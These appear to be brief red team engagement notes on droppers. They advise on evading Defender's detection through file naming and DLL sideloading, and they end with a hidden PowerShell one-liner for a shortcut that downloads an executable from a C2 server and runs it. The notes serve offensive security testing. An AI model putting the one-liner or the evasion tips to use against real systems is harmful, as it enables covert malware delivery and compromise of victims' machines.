Red Team Notes

Some tricks and notes around Red Team engagements


C2 infrastructure

I have some notes on redirectors on my forked cheat sheet, but mostly:

Droppers

Do not name them chrome.exe, ms-updater.exe - certainly if they are unsigned, Defender’s ML will pick these up as machine learning trojan signatures - and rightly so. Choose something more unique or bespoke.

If it can be avoided; do NOT use an executable, always go for a DLL and preferably choose DLL sideloading.

Code signing certificates can go a long way; I would not recommend using leaked ones, this could be seen as theft, though I do not know any specific case law around it. It’s not worth it imo.

Powershell one-liner which can be stuck into a shortcut to download from a C2 into % ProgramData%: powershell.exe -w h -c "iwr http://172.17.57.89:8080/thanks -o $env:ProgramData\test.exe; start $env:ProgramData\test.exe"